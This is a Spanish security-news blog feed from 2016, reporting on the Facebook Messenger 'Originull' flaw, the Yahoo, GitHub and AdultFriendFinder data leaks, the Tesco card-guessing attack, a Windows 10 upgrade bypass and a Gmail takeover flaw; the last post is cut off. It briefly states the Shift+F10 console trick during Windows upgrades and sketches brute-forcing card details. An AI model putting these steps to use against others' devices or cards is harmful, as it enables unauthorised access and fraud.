tag:blogger.com,1999:blog-51770143003662390332024-03-15T18:09:51.388-07:00Carluys BlogTecnología, Seguridad Informática, Programación, Internet, Noticias, Software, Hardware, Moviles, Trucos y otras cosas...Unknownnoreply@blogger.comBlogger21125tag:blogger.com,1999:blog-5177014300366239033.post-12210325311432504432016-12-15T09:34:00.000-08:002016-12-15T09:41:05.750-08:00Vulnerabilidad simple permite que los hackers puedan leer todos los chats privados de Facebook MessengerUn investigador de seguridad ha descubierto una vulnerabilidad crítica en <b>Facebook Messenger</b> que podría permitir a un atacante leer toda su conversación privada, que afecta a la privacidad de alrededor de 1 mil millones de usuarios de Messenger.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4HRv0u4b4W3BKNrXxzaszPrM_PWezs3WfMPGJ-l-nue1EQUxbrmaszL2CJtrI3PFlXqWd7bdJ_a082yW3RiMI6fcYev8z0bn_fOcycAbkn09H5gpPcHCV8OqKk5ZlnPPpxcKiCqMXgtIM/s1600/hacking-facebook-messenger-chats.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4HRv0u4b4W3BKNrXxzaszPrM_PWezs3WfMPGJ-l-nue1EQUxbrmaszL2CJtrI3PFlXqWd7bdJ_a082yW3RiMI6fcYev8z0bn_fOcycAbkn09H5gpPcHCV8OqKk5ZlnPPpxcKiCqMXgtIM/s400/hacking-facebook-messenger-chats.JPG" width="400" height="209" /></a></div><br>
Ysrael Gurt, el investigador de seguridad en <a href="https://www.bugsec.com/">BugSec</a> y Cynet, <a href="http://www.cynet.com/blog-facebook-originull/">informó</a> un cross-origin bypass-attack contra Facebook Messenger que permite a un atacante acceder a sus mensajes, fotos, así como archivos adjuntos enviados en el chat de Facebook.
<blockquote>Para aprovechar esta vulnerabilidad, lo que realiza el atacante es engañar a la víctima para que visite un sitio web malicioso; eso es todo. Una vez que se hace click, todas las conversaciones privadas por la víctima, ya sea de aplicación móvil de un Facebook o un navegador web, sería accesible para el atacante, debido a la falla afectó tanto el chat en la web, así como la aplicación móvil.<br><br>
Apodado " <b><i>Originull</i></b> ," la vulnerabilidad en realidad se encuentra en el hecho de que los chats de Facebook se gestionan desde un servidor ubicado en <b>{número}</b>-edge-chat.facebook.com, que está separado del dominio real de Facebook (<b>www.facebook.com</b>).
</blockquote>
La raíz de este problema es que estaba mal configurada la aplicación de encabezado de origen y el dominio del servidor de chat de Facebook, que permite a un atacante eludir los controles de origen y acceder a los mensajes de Facebook de una página web externa.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg14Ho6xJL5oK7b0j7TnL030KKmZjuWYf1JvrmNQZUinyfbAPdSbBBZlSD-_tazHh0x55__xHi8jCkvWBCiHUqjSBDTCz3XySslV_ARTTmQHnvp5VwqNfoMn5E_zxLsuyWq4G94eNYOrbZ7/s1600/hack-facebook-messenger.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg14Ho6xJL5oK7b0j7TnL030KKmZjuWYf1JvrmNQZUinyfbAPdSbBBZlSD-_tazHh0x55__xHi8jCkvWBCiHUqjSBDTCz3XySslV_ARTTmQHnvp5VwqNfoMn5E_zxLsuyWq4G94eNYOrbZ7/s400/hack-facebook-messenger.png" width="400" height="209" /></a></div><br>
Gurt también ha publicado un vídeo de demostración de prueba de concepto de la vulnerabilidad Originull, que muestra el cross-origin bypass-attack en acción.<br><br>
<center><iframe width="600" height="439" src="https://www.youtube.com/embed/F__Fzt7vOwE" frameborder="0" allowfullscreen></iframe></center><br>
Si quieres consultar el informe técnico completo, puedes hacerlo desde <a href="http://www.cynet.com/wp-content/uploads/2016/12/Blog-Post-BugSec-Cynet-Facebook-Originull.pdf">este enlace</a>.
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-41725887425459272972016-12-15T08:08:00.000-08:002016-12-15T08:49:42.899-08:00Último hackeo de Yahoo afecta a 1.000 millones de cuentasYahoo, en el ojo del huracán luego de que hace unos meses anunciara que <a href="http://www.carluys.com/2016/09/500-millones-de-usuarios-hackeados-en.html">500 millones de cuentas de sus usuarios habían sido hackeadas</a> en 2014, <a href="https://investor.yahoo.net/releasedetail.cfm?ReleaseID=1004285">reveló el miércoles</a> que otro ataque perpetrado en 2013 ya había comprometido más de mil millones de cuentas.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS_wV8mW3rJS1Acd3Qr7bYSR0gyUFVWPxHWqZe7qbbRBethSILEIlLhywjrfyWz6XQ_ohhnu3YIYnOAwJXL62y7MAUyyYpwy-ZWgwqSBbsKzbOtrHQeVsQGqAZakb0ekVeB5deHgtEB-ik/s1600/yahoo-hacking.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS_wV8mW3rJS1Acd3Qr7bYSR0gyUFVWPxHWqZe7qbbRBethSILEIlLhywjrfyWz6XQ_ohhnu3YIYnOAwJXL62y7MAUyyYpwy-ZWgwqSBbsKzbOtrHQeVsQGqAZakb0ekVeB5deHgtEB-ik/s400/yahoo-hacking.jpg" width="400" height="226" /></a></div><br>
El ataque involucró información más sensible de los usuarios, incluyendo preguntas de seguridad no codificadas. Yahoo está obligando a todos los usuarios afectados a cambiar sus contraseñas e inició el proceso de invalidación de las preguntas de seguridad.
<blockquote>Si a estos problemas de seguridad informática de Yahoo se le une su colaboración con la CIA y el FBI, que llegaron a tener acceso a todos los correos de sus usuarios, queda un panorama desolador. Poca gente puede estar interesada en tener una cuenta de correo en un servicio que no garantiza la seguridad o al anonimato.<br><br>
<b>Estamos hablando del mayor hackeo de la historia de la informática</b>, aunque lo rocambolesco no queda sólo en el número: Yahoo no sabe de qué forma lograron acceder a su base de datos para hacerse con los datos personales de sus usuarios, aunque dicen que lo están investigando. También aclaran que no creen -y esto significa que no están seguros del todo- que se haya filtrado información bancaria.</blockquote>
Lord dijo que después de estos ataques, Yahoo había tomado medidas para mejorar sus sistemas. La compañía alentó a sus usuarios para que cambiaran las contraseñas asociadas con su cuenta y cualquier otra cuenta digital vinculada a Yahoo.<br><br>
Cambiar las contraseñas solo será el comienzo para muchos usuarios. También tendrán que revisar otros servicios para asegurarse de que las contraseñas utilizadas en esos sitios no sean muy similares a las que estaban utilizando en Yahoo. Y tendrán que considerar todo lo que reciben en línea, como correos electrónicos, con una gran sospecha, en caso de que los hackers estén tratando de engañarlos.<br><br>
Si lo deseas, en la web <a href="https://haveibeenpwned.com/">Have I been Pwned</a> puedes comprobar si tu cuenta está entre las afectadas por esta o por otra brecha de seguridad. Yahoo le recomendó a sus clientes utilizar la <a href="https://help.yahoo.com/kb/SLN25781.html">Yahoo Account Key</a>, una herramienta de autenticación que verifica la identidad con un teléfono móvil y elimina la necesidad de usar una contraseña.
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-60539569115072485982016-12-08T13:27:00.002-08:002016-12-08T13:27:41.629-08:00La Darknet ofrecen recompensas a cambio de ataques DDoSUn grupo de cibercriminales turcos ha creado una plataforma para conseguir mano de obra gratuita que cometa sus crímenes por ellos. Lo han hecho convirtiendo el hackeo en un juego, ofreciendo a los usuarios recompensas a cambio de participar en ataques DDoS.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu6bMIbvlM-I7B4FG7HxtrD7H2Ez5LMJGEWa4HSjnaLtmZSXixqfUtK5slmb24MMKeQB68Ii0FUFPyH9eoSJW6OLDmi1hx-poKPMywP4_TzeMUbffByZuOVrzR9dhAu2jZra4fsOm2Ldmw/s1600/recompensas_hacker.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu6bMIbvlM-I7B4FG7HxtrD7H2Ez5LMJGEWa4HSjnaLtmZSXixqfUtK5slmb24MMKeQB68Ii0FUFPyH9eoSJW6OLDmi1hx-poKPMywP4_TzeMUbffByZuOVrzR9dhAu2jZra4fsOm2Ldmw/s400/recompensas_hacker.jpg" width="400" height="226" /></a></div><br>
¿Qué recompensas? Os preguntaréis. ¿Qué puede hacer que sujetos inocentes se apunten a hacerle el trabajo sucio a un grupo de cibercriminales? Pues lo que consiguen los usuarios por participar en ataques DDoS son puntos, que podrán ir acumulando dependiendo de hasta que punto participen en las actividades.
<blockquote>Y lo más curiosos es que estos puntos se podrán utilizar para cambiarlos por herramientas de hackeo. Herramientas que, dicho sea de paso, nadie ha comprobado, y podría tratarse de contenido malicioso que infectase los ordenadores de los que intentasen participar y beneficiarse de los ciberataques.<br><br>
La plataforma pide a los usuarios que ataquen páginas webs políticas mediante una herramienta de DDoS conocido como Bayloz, que se puede traducir como "El Mazo". </blockquote>
Para participar, los usuarios que han sido reclutados en foros de hacking (que no mencionaremos) se descargan e instalan un software y se registran. Una vez lo han conseguido, tienen la herramientas para atacar mediante DDoS un número limitado de objetivos, que limita el propio programa. <br><br>
Para mantener el juego interesante, los cibercriminales han montado incluso un marcador de puntuaciones, que transmite en vivo cuánto ha conseguido cada usuario. Algunos usuarios ya han conseguido un par de centenares de puntos. <br><br>
Según parece, está atacando sitios como la web del Instituto Nacional Armenio, la del Partido Democrático Alemán, aunque según parece van a aparecer aún más objetivos si resulta que la plataforma funciona. Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-69643149451089264272016-12-05T15:11:00.000-08:002016-12-05T15:11:26.842-08:00Seis segundos es lo que se necesita para robar el dinero de tu tarjetaEl banco Tesco perdió 2,5 millones de libras en un ataque que tumbó toda la seguridad de la pasarela de pago de tarjetas Visa en uno de los robos cibernéticos más importantes de los últimos años. Ahora, una firma de seguridad ha emitido un estudio donde explican cómo los hackers pudieron robar el dinero de las tarjetas Visa del banco Tesco, un estudio que demuestra que en tan sólo seis segundos un atacante se puede hacer con el dinero de nuestra tarjeta de crédito o de débito.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-9vXFipD_68QMzfq0mES_EIRlUYNdK5ldh_ks1_gTeIcFcIhkvIIzh-p91THVcGqWNDIvh9T9TSNycyMGvuu-TqpUHFJtZY-xjFotUsNOCzqeQAnrtFRS8GGbc1deLHNd2jPtqqqc7jzd/s1600/td-hacking.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-9vXFipD_68QMzfq0mES_EIRlUYNdK5ldh_ks1_gTeIcFcIhkvIIzh-p91THVcGqWNDIvh9T9TSNycyMGvuu-TqpUHFJtZY-xjFotUsNOCzqeQAnrtFRS8GGbc1deLHNd2jPtqqqc7jzd/s400/td-hacking.jpg" width="400" height="225" /></a></div><br>
Expertos de seguridad de la Universidad de Newcastle han demostrado en su último informe que los robos al banco Tesco se deben a fallos de seguridad en los sistemas de pagos Visa que permitían descubrir el número de tarjeta, su fecha de caducidad y hasta el número de seguridad en sólo seis segundos. Al método utilizado por los atacantes se le ha bautizado como ‘Distributed Guessing Attack’ y, en términos informáticos, era un procedimiento muy sencillo de realizar sólo mediante fuerza bruta.<br><br>
<center><iframe width="623" height="381" src="https://www.youtube.com/embed/uwvjZGKwKvY" frameborder="0" allowfullscreen></iframe></center>
<blockquote>
El problema de seguridad en la pasarela de pago Visa es que el sistema no detectaba que se hacían múltiples intentos de conseguir la información de la tarjeta, con lo que era posible conseguir información válida con el simple método de acierto y error. Lo anterior era combinado por los atacantes con datos de otros sistemas de pago para validar todos los campos de la tarjeta, reordenándolo para el ataque final.</blockquote>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Dkph50L0uH_3AjXwC1bdRZUpRKpQzNylVeqLX3hP2Pth4WWmlI-aW1JwmUBmwF_UAF9I38t_di1vECtbyhfcQ9U6miww-F3dFyGBcdxdafjpfDtcFE6tg-ZORdFeUnfoB4yG7vaDvDbq/s1600/visatesco.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Dkph50L0uH_3AjXwC1bdRZUpRKpQzNylVeqLX3hP2Pth4WWmlI-aW1JwmUBmwF_UAF9I38t_di1vECtbyhfcQ9U6miww-F3dFyGBcdxdafjpfDtcFE6tg-ZORdFeUnfoB4yG7vaDvDbq/s400/visatesco.jpg" width="400" height="286" /></a></div><br>
De esta manera cada campo generado por la tarjeta se podía usar para el siguiente campo, y así de forma ilimitada sin que hubiera bloqueo por los continuos intentos de acceso. Este estudio también ha demostrado que con sólo tener los seis primeros números de la tarjeta se pueden realizar ataques, pudiendo conseguir el resto de campos requeridos como fecha de caducidad y número secreto.
<blockquote>Visa se protege y no da validez al estudio señalando que “la investigación no ha tenido en cuenta las múltiples capas de seguridad presentes en los sistemas de pago”.</blockquote>
Fuente: <a href="https://www.theguardian.com/technology/2016/dec/02/tesco-bank-cyber-attack-involved-simply-guessing-details-study-claims">TheGuardian</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-47112137606629746032016-11-30T08:27:00.000-08:002016-11-30T08:27:04.416-08:00Si actualizas Windows 10 puedes ser vulnerable a los hackersLas actualizaciones de Windows 10 no sólo son un incordio, sino que pueden llegar a ser un peligro para tu ordenador. Durante semanas se ha llevado en secreto, pero la información ha terminado por salir a la luz: actualizar Windows 10 provoca una vulnerabilidad crítica que te pone al alcance de los hackers.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsj_BmfaYbdVfLdcBC7o7jdnGKJc9ojnjU6wmjoLktiWbAkGnj4qsNktK5JFyUUdYwzV-GufLqVT9YhhAnO0VvM4CC0IjcNcornag6i8tyuwJWwNT5G9elqfqFg5t0SDZ4DD7XjS4_b_0M/s1600/windows-10-hacking.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsj_BmfaYbdVfLdcBC7o7jdnGKJc9ojnjU6wmjoLktiWbAkGnj4qsNktK5JFyUUdYwzV-GufLqVT9YhhAnO0VvM4CC0IjcNcornag6i8tyuwJWwNT5G9elqfqFg5t0SDZ4DD7XjS4_b_0M/s400/windows-10-hacking.jpg" width="400" height="193" /></a></div><br>
Este bug de Windows puede ser aprovechado por cualquier hacker para concederse a sí mismo privilegios de administrador del sistema, y es que en eso consisten las vulnerabilidades informáticas. Según declara Microsoft, están trabajando en un parche para W10 que solucione este grave problema.
<blockquote>La vulnerabilidad de las actualizaciones de Windows 10 consiste en lo siguiente: BitLocker queda automática y temporalmente desactivado cuando una Build del sistema se está instalando. Es el sistema de cifrado del disco duro, por lo que cualquier persona con los suficientes conocimientos puede acceder a él y modificarlo o dañarlo sin ser administrador.<br><br>
Para hacerlo, basta con presionar las teclas Mayúscula y F10 simultáneamente. La consola de comandos se abre y lo hace con privilegios de administrador, el conocido como acceso root a Windows.</blockquote>
La alarma se debe más a lo que supone la mera existencia de la vulnerabilidad que al daño que puede causar. Para aprovecharla, el hacker debe tener acceso al ordenador con W10 durante la actualización. No se puede ejecutar de forma remota, por lo que no hay riesgo de destruir tu ordenador si no te alejas de él durante mucho tiempo mientras se instala una nueva build.<br><br>
El bug de Windows 10 afecta a usuarios con varias versiones del sistema operativo, incluidos los que actualizan a la Edición Aniversario que la compañía liberó hace poco. Si tienes la versión RTM posteior a las builds 1511 o 1607, ten cuidado.<br><br>
No es el primer incidente que desatan las actualizaciones de W10. Microsoft ha relajado su política de forzar la instalación de nuevas versiones del firmware, aunque parece que la seguridad informática en Windows sigue siendo un problema constante.<br><br>
Fuente: <a href="http://blog.win-fu.com/2016/11/every-windows-10-in-place-upgrade-is.html">Win-Fu</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-49381476695584116612016-11-20T08:46:00.000-08:002016-11-20T08:57:32.963-08:00Cómo puedes saber si están hackeando la cámara de tu ordenadorHace menos de un mes salía a la luz la última temporada de Black Mirror. Como muchos de nosotros sabemos, esta serie trata sobre una serie de hechos irreales que podrían llegar a suceder si lleváramos cualquier elemento tecnológico al extremo.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrDlUQeh7CC_a7u4W8CZXnl0kGpr33JOSDC1Q2CinqvtG54daNXp1QwD44AXWV_XQ0zKv_f8-wrQ5oUysjonlK9kKHAw4p1ZusOLGrDzJcvmu0xaRo8OnsuaxW3KfdApqGa2Gk0W7xoY2J/s1600/hackear-android-carluys.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrDlUQeh7CC_a7u4W8CZXnl0kGpr33JOSDC1Q2CinqvtG54daNXp1QwD44AXWV_XQ0zKv_f8-wrQ5oUysjonlK9kKHAw4p1ZusOLGrDzJcvmu0xaRo8OnsuaxW3KfdApqGa2Gk0W7xoY2J/s400/hackear-android-carluys.jpg" width="400" height="187" /></a></div><br>
Uno de sus últimos episodios trata sobre un adolescente al que le hackean la webcam de su ordenador. A raíz de ese suceso le chantajean y le corrompen hasta puntos insospechados. Pues bien, si tú no quieres que te crackeen la cámara del ordenador, te recomendamos seguir esta serie de pautas que nos proponen desde <a href="http://www.bloglenovo.es/como-saber-crackeado-camara-ordenador/">Blog Lenovo</a>.<br><br>
Lo primero que hay que tener en cuenta es que, normalmente, cuando una webcam está funcionando se enciende un LED. Así que si éste parpadea en algún momento, alguien está haciendo uso de la cámara de tu ordenador sin permiso.<br><br>
Para evitarlo, habrá que buscar toda la información en el controlador. En nuestro ordenador aparecerán todos los dispositivos conectados en Configuración > Dispositivos. Después, sigue estos pasos haciendo click con el botón derecho del ratón:
<blockquote>
<ul>
<li>Una vez dentro del Cuadro de Propiedades de Dispositivo > Controlador > Desinstalar</li><br>
<li>Reinicia el ordenador</li><br>
<li>Abre el Administrador de Dispositivos > Acción > Buscar cambios de hardware</li><br>
<li>Cambiar el tipo de inicio en Registro</li>
</ul></blockquote>
Estos pasos serán como resetear la información del ordenador, una de las opciones más molestas para un ciberdelincuente.<br><br>
También habrá que tenerlo actualizado y, para ello, sólo tendremos que hacer click con el botón derecho > Instalar software más reciente/Actualizar software del controlador. Después, actualizaremos vía Internet.<br><br>
También te recomendamos mejorar la seguridad de tu red, así como mantener el software de tu cámara actualizado. Finalmente, nunca está de más tener un <a href="https://www.infospyware.com/antivirus/">buen antivirus</a> instalado para proteger tu webcam. <br><br>
Vía | <a href="http://www.bloglenovo.es/como-saber-crackeado-camara-ordenador/">Blog Lenovo</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-50456666898937812372016-11-18T09:08:00.000-08:002016-11-18T09:09:03.478-08:00Se filtraron en la red 8 millones de perfiles privados de GitHubMuchos son los grupos que, bien por mostrar su habilidades a la comunidad o directamente para conseguir beneficios económicos, se dedican a intentar no solo tumbar servidores, sino a romper su seguridad y hacerse con todo tipo de datos sensibles que estos puedan contener. En esta ocasión tenemos que hablar del robo perpetrado a la conocida plataforma GitHub donde los ladrones han conseguido hacerse con nada menos que 8 millones de perfiles privados.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtrjnDgmNksalfWYSTmk7vm4vr4TwfDLtLArufBi7MWy1AtiB3sIagYMCDgbnyHZWr1VXuMZ05wTh_vTFCkZq1YIdzr_COehVI-S7-c8kgfiVTqvBdhBffLzpdasCqKOvM3U8aKBvPKETP/s1600/hack-1-carluys.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtrjnDgmNksalfWYSTmk7vm4vr4TwfDLtLArufBi7MWy1AtiB3sIagYMCDgbnyHZWr1VXuMZ05wTh_vTFCkZq1YIdzr_COehVI-S7-c8kgfiVTqvBdhBffLzpdasCqKOvM3U8aKBvPKETP/s400/hack-1-carluys.jpg" width="400" height="207" /></a></div><br>
Como suele ocurrir, este tipo de cuentas presenta multitud de datos privados e información personal de los usuarios, lamentablemente todos estos datos han sido filtrados por lo que muchos de los usuarios de esta plataforma especializada para desarrolladores y expertos en informática en general, pueden ver sus cuentas comprometidas.<br><br>
<h3>El ataque a GitHub culmina con el robo de más de 8 millones de perfiles privados</h3><br>
Atendiendo a las declaraciones realizadas por Troy Hunt, director regional de Microsoft:
<blockquote>GitHub tiene un gran historial de manejo de incidentes de seguridad, no sólo en términos de haber tenido mucha experiencia con ellos, sino en la forma en la que los han tratado. A lo largo del tiempo han tenido muchos, algunas veces han respondido bien y en otras ocasiones han actuado como cortafuegos anee una amenaza mayor.<br><br>
A pesar de lo que muchos puedan llegar a pensar, las filtraciones no se produjeron desde dentro de la página. Son muchos los usuarios que se preguntan si es la misma web la que revela la información pero no es así.</blockquote>
Como puedes leer en estas declaraciones, no es la primera vez que la plataforma sufre un ataque de este tipo y tampoco es la primera vez que se sufren filtraciones de información de usuarios de GitHub a la red por lo que sus responsables deberían prestar más atención a los fallos de seguridad que tiene la plataforma.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-62418879163396519112016-11-17T07:29:00.000-08:002016-11-17T07:29:08.814-08:00Un grupo de hackers utilizó FIFA para robar millones a EAEl FBI se encuentra investigando a un grupo de hackers, llamado RANE Developments, por haber cometido una estafa para robar millones de dólares a Electronic Arts a través del FIFA. El equipo está compuesto por cuatro hackers que serán juzgados en Texas (Estados Unidos) por conspiración para cometer fraude electrónico.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii3dqZOBe1gJjY9jHdQT7YaXGdOGf_ED2Cv_AHe4iWMBJVGQbpdwgZ3JZKvI383LeUTMYMxeIQYd-guaIIY0jZeYrsIdXdOsuJQbvFw-eZxpmmPCJxdOBtBElBJK0SvSnid3FW6vXGs_uZ/s1600/ea-fifa-carluys.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii3dqZOBe1gJjY9jHdQT7YaXGdOGf_ED2Cv_AHe4iWMBJVGQbpdwgZ3JZKvI383LeUTMYMxeIQYd-guaIIY0jZeYrsIdXdOsuJQbvFw-eZxpmmPCJxdOBtBElBJK0SvSnid3FW6vXGs_uZ/s400/ea-fifa-carluys.jpg" width="400" height="226" /></a></div><br>
Según informa <a href="http://kotaku.com/man-goes-on-trial-for-allegedly-stealing-millions-from-1788948231">Kotaku</a>, la justicia estadounidense está juzgando a un hombre por organizar el fraude con ayuda de otros tres hackers. La estafa consistía en acceder a los servidores de EA, conseguir ilegítimamente dinero virtual del 'FIFA' y venderlas en el mercado negro de divisas de Europa y China. En total, el FBI cree que consiguieron entre 15 y 18 millones de dólares (14 y 16,8 millones de euros) por este sistema.
<blockquote>Las monedas de FIFA, el dinero virtual de esta saga de videojuegos, sirve para comprar cromos de jugadores, si bien dicho dinero se puede obtener también jugando. El acusado y sus colaboradores habían construido una herramienta que les permitía mandar falsas señales a los servidores de EA para crear partidas al juego de forma muy rápida y así poder conseguir monedas. <br><br>
Desde 2013 hasta septiembre de 2015, usaron esta herramienta para obtener millones en webs también ilegales dedicadas específicamente a la compraventa de monedas de estos videojuegos.</blockquote>
El éxito de las monedas de FIFA, en todo caso, es innegable y EA ha acumulado ingresos millonarios gracias a las compras dentro de sus videojuegos.<br><br>
Fuente: <a href="http://kotaku.com/man-goes-on-trial-for-allegedly-stealing-millions-from-1788948231">Kotaku</a>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-11238453531092462812016-11-14T06:14:00.000-08:002016-11-14T06:15:39.988-08:00AdultFriendFinder hackeada y más de 400 millones de cuentas expuestasSegún informa la web <a href="https://www.leakedsource.com/blog/friendfinder">LeakedSource</a> en un completa investigación que hoy ha hecho pública, las webs de la compañía Friend Finder Networks han sido hackeadas. Alrededor de 400 millones de cuentas han sido robadas, y todos sus datos privados han quedado expuestos, incluyendo la dirección IP de los usuarios, y si contrató o no servicios de pago.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidoEAJ5y2DIhVghjtDSgZdA0eBQOXdY-Hf1DJzSOGQERRHrN7N6UyOr2rXlXhcMECpg9OsTj6ANXQ9dDSWjDa8Dlm-z0UqYSyHEXBYY_CYomUEKQNfAe0QQptFxv0sXdI1hLopAg9Edovp/s1600/adultfriendfinder-hackeada-carluys.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidoEAJ5y2DIhVghjtDSgZdA0eBQOXdY-Hf1DJzSOGQERRHrN7N6UyOr2rXlXhcMECpg9OsTj6ANXQ9dDSWjDa8Dlm-z0UqYSyHEXBYY_CYomUEKQNfAe0QQptFxv0sXdI1hLopAg9Edovp/s400/adultfriendfinder-hackeada-carluys.jpg" width="400" height="226" /></a></div><br>
Los analistas de Leaked Source sí han explicitado qué tipo de datos hay y han hecho estadísticias anónimas sobre la información que revelan la debilidad de las contraseñas, los servicios de correos más utilizados o la procedencia de los usuarios. Los que utilizan el castellano como lengua son la segunda comunidad, con más de 63 millones de cuentas.<br><br>
Friend Finder ya sufrió, según Leaked Source, una intrusión informática el año pasado que expuso cuatro millones de cuentas. El ataque se realizó a través de un programa que permitió a un atacante introducirse en el servidor central de la compañía. Entonces contrataron a una prominente compañía de seguridad, FireEye, para resolver sus fallos. Este último ataque podría haberse realizado sobre el 17 de octubre aunque los datos se habrían dado a conocer ahora.
Llama mucho la atención el hecho de que las tres contraseñas más utilizadas son 123456, 12345 y 123456789, pese a las continuas recomendaciones de los expertos de la necesidad de recurrir a contraseñas más elaboradas y difíciles de averiguar. La empresa Friend Finder Networks ha confirmado la existencia de vulnerabilidades de seguridad en la web, aunque aún no ha reconocido públicamente el hackeo, según cuenta Mashable.
<blockquote>"Durante las últimas semanas, FriendFinder ha recibido una serie de informaciones sobre potenciales amenazas de vulnerabilidades de seguridad a partir de una variedad de fuentes", ha dicho la vicepresidenta de la compañía, Diana Ballout, a <a href="http://www.zdnet.com/article/adultfriendfinder-network-hack-exposes-secrets-of-412-million-users/">ZDNet</a>. "Inmediatamente después de conocer esta información, tomamos varias medidas para examinar la situación y traer a los socios externos adecuados para apoyar nuestra investigación", ha informado.</blockquote>
Fuente: <a href="https://www.leakedsource.com/blog/friendfinder">LeakedSource</a>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5177014300366239033.post-63645235031474591372016-11-07T14:01:00.000-08:002016-11-07T14:01:20.100-08:00Vulnerabilidad en Gmail permite robar cualquier cuentaA veces son las propias empresas las que, sin quererlo, abren una puerta trasera para que cualquier hacker pueda entrar a sus servicios, incluso poniendo en jaque información comprometida de los usuarios. Un investigador de seguridad pakistaní ha descubierto una importante vulnerabilidad en Gmail que permite a cualquier persona robar cuentas de correo ajenas sin tener muchos conocimientos de informática.<br><br>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlszjrBX5s3qi-D-APKVYKYTpa71mZE-IZ-C-y1sxyGa5SMZ3ZK-31gERVf7UfMp_48nasXPDU4MUDzGFE6sWswQns9DRb_RIGRq6Vo3haZ_xnGDxLT-x8p-R4ma1xCO7rR1XKhW64hR3M/s1600/hack-gmail-carluys.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlszjrBX5s3qi-D-APKVYKYTpa71mZE-IZ-C-y1sxyGa5SMZ3ZK-31gERVf7UfMp_48nasXPDU4MUDzGFE6sWswQns9DRb_RIGRq6Vo3haZ_xnGDxLT-x8p-R4ma1xCO7rR1XKhW64hR3M/s400/hack-gmail-carluys.jpg" width="400" height="226" /></a></div><br>
Las grandes compañías cuentan con programas de recompensas destinados a evitar que vulnerabilidades en sus servicios sean expuestos y aprovechados por los hackers o en el mercado oscuro de la red. El programa de recompensas de Google invita a cualquier persona, especialmente a investigadores de seguridad, a que encuentren cualquier vulnerabilidad en sus servicios a cambio de recompensas de hasta 20.000 dólares.<br><br>
El pakistaní Ahmed Mehtab, investigador y también CEO de Security Fuss, ha encontrado una vulnerabilidad relativa al proceso de verificación de Gmail que permite a cualquier atacante tomar control de una cuenta deseada.
<blockquote>Todos sabemos que Google permite a una sola persona asociar todas sus cuentas de correo de Gmail para realizar una serie de acciones conjuntas, incluida la recuperación de cuentas. Pues este proceso de verificación de Gmail es vulnerable pudiendo secuestrar la ID de una cuenta ajena con un sencillo procedimiento.
Lo primero, para que esto sea posible, el destinatario del SMTP no debe estar conectado, o que haya desactivado la cuenta, o que no exista el ID donde enviar el mensaje de confirmación o que el destinatario haya bloqueado previamente al remitente.</blockquote>
